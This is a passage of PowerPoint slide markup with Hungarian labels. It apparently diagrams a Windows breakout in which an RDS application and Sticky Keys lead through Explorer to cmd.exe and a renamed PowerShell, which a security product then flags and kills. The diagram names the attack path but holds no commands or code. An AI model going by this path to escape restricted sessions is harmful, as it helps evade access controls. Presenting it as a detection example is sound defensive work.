              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>RDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold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CC02EA0E-2635-492A-D2C0-687F7703D931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38948" y="1927554"/>
            <a:ext cx="3980080" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>RDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>futtatja az alkalmazást</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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A30173E-9306-A500-1716-0E89FC828A96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598564" y="1956357"/>
            <a:ext cx="3102158" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Sticky Keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>elindítva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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DD29877-75DA-F0A3-C861-714DB7EAA6DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13137357" y="1950271"/>
            <a:ext cx="3473660" cy="4770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hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vezérlőpult -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Explorer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="111" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{642BD90B-EA71-C24D-8907-92D3BD9FFEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="135" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="13286826" y="5896224"/>
            <a:ext cx="1305483" cy="307010"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxn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2CF9F0C2-CE14-0097-E970-EA352030A47F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13676611" y="4992086"/>
            <a:ext cx="1768546" cy="442159"/>
            <a:chOff x="12235545" y="1103018"/>
            <a:chExt cx="2009738" cy="468180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="Rounded Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B0F2C2-5A56-1EA3-B67D-A7F7872A2154}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235545" y="1103018"/>
              <a:ext cx="2009737" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C2BEDC-8C4B-C038-8BA7-51E513F5DDF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12379151" y="1139122"/>
              <a:ext cx="1866132" cy="431225"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>explorer.exe</a:t>
              </a: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FF0A4694-C1CA-E8DF-E0BC-4DBEFDF2C6AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14511115" y="6888294"/>
            <a:ext cx="3300636" cy="788015"/>
            <a:chOff x="12600385" y="914400"/>
            <a:chExt cx="3750773" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Rounded Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8171B9A-0D5B-0BE7-3CFC-B8AEAEB5EAF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600385" y="1103018"/>
              <a:ext cx="3750773" cy="468180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 w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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7" name="Graphic 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66BAE14F-AF1C-25D9-ADE9-F6AD31F8C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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DDE1736-A9D2-EDC1-258F-D63FD952B24A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341700" y="914400"/>
              <a:ext cx="2998633" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Powershell_custom.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="115" name="Elbow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136A4379-A356-B0C1-3BC2-C4BC63A50AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="126" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="14098521" y="6874915"/>
            <a:ext cx="573510" cy="251678"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxn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0E81A0D-0964-752C-ECE6-6702CED7460B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14100245" y="7981208"/>
            <a:ext cx="3260029" cy="788015"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3704628" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123" name="Rounded Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3EE4A09-AAE4-614B-3F5E-2CE77A7D97CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2042050" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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4" name="Graphic 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E18C22-4E48-277C-1B32-2CFCC8935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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A02D70B-16C8-AD6E-B8CA-61320FA3A120}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341700" y="914400"/>
              <a:ext cx="2963312" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="117" name="Elbow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5871BFD1-2BEB-77E1-F83B-E26AF3F5E31B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="123" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="12799441" y="7079619"/>
            <a:ext cx="2286558" cy="315050"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxn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C7EA6C97-2349-72AC-CD42-CBDF80A7C401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14050522" y="8775796"/>
            <a:ext cx="3309753" cy="788015"/>
            <a:chOff x="12600383" y="914400"/>
            <a:chExt cx="3761133" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="120" name="Rounded Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{655B9D4A-3C72-C333-7D63-A52FC216D371}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600383" y="1103018"/>
              <a:ext cx="2867059" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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1" name="Graphic 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3AB67A-6825-DE9D-0BDF-D21F84004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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226EE1E6-4798-3F6B-A6BC-A93CB2F19520}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341700" y="914400"/>
              <a:ext cx="3019816" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>powershell.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="119" name="Elbow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7E9465-7966-CB3A-D46A-1BF91AFE3D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="120" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="13492014" y="8616503"/>
            <a:ext cx="851690" cy="265326"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxn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2EB99709-F122-7944-7BAC-4BFFAA350AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14610016" y="7563400"/>
            <a:ext cx="3506465" cy="441651"/>
            <a:chOff x="8721622" y="5640503"/>
            <a:chExt cx="3984673" cy="467642"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3403C360-354C-5A83-19CA-60E916CC47E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9028055" y="5640503"/>
              <a:ext cx="3678240" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:srgbClr val="D80B55">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="1371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cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Killed Process – Renamed PowerShell</a:t>
              </a:r>
              <a:b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cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:b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65000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Execution [D0411]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="147" name="Graphic 146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A628E95F-36E2-F998-F8E9-1551703C8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8721622" y="5686173"/>
              <a:ext cx="300198" cy="300198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="164" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6A4928-D6A2-7CA7-9B33-FC8BCB8D0451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="129" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="13284096" y="4820651"/>
            <a:ext cx="577634" cy="207396"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="340" name="Group 339">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB69D40-B2E6-EC42-E7DF-9B5EFE06697D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3933517" y="3463803"/>
            <a:ext cx="4319580" cy="4633355"/>
            <a:chOff x="4562777" y="4712505"/>
            <a:chExt cx="4319580" cy="4633355"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="Rectangle: Rounded Corners 338">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6E1C80-4813-A49B-61E9-D87BBBA84826}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4562778" y="5983083"/>
              <a:ext cx="4258032" cy="3362777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78A0D077-752E-79A7-7402-B12AB1A89519}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4656510" y="4712505"/>
              <a:ext cx="3960514" cy="2698842"/>
              <a:chOff x="5279745" y="3170469"/>
              <a:chExt cx="4500644" cy="2857667"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="254" name="Elbow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814DB453-F583-ADED-7A09-4A6247FFC624}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="269" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="5504212" y="5183751"/>
                <a:ext cx="617552" cy="247854"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="424D56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263" name="Elbow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C895F2-01C6-BFAA-3E85-23202C0ADC18}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="276" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="4590875" y="3859339"/>
                <a:ext cx="1692011" cy="314272"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:tailEnd type="arrow"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="268" name="Group 267">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0983729-344F-A226-B305-3AD5E7E594F2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5936915" y="5193746"/>
                <a:ext cx="3843474" cy="834390"/>
                <a:chOff x="12600383" y="914400"/>
                <a:chExt cx="3843474" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="269" name="Rounded Rectangle 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B748EFA7-0999-0E3C-21EF-64656CCE66EB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600383" y="1103018"/>
                  <a:ext cx="3781943" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="424D56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9489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SK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70" name="Graphic 269">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1106BEF3-C549-B362-A9B7-D698F0A1ECA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  <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12766356" y="1162059"/>
                  <a:ext cx="549560" cy="335445"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="271" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{489AE7A5-F0F6-C240-DCD9-22A82D22DD74}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="13341700" y="914400"/>
                  <a:ext cx="3102157" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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1811382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1600" kern="0" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>easeofaccessdialog</a:t>
                  </a:r>
                  <a:r>
                    <a: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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
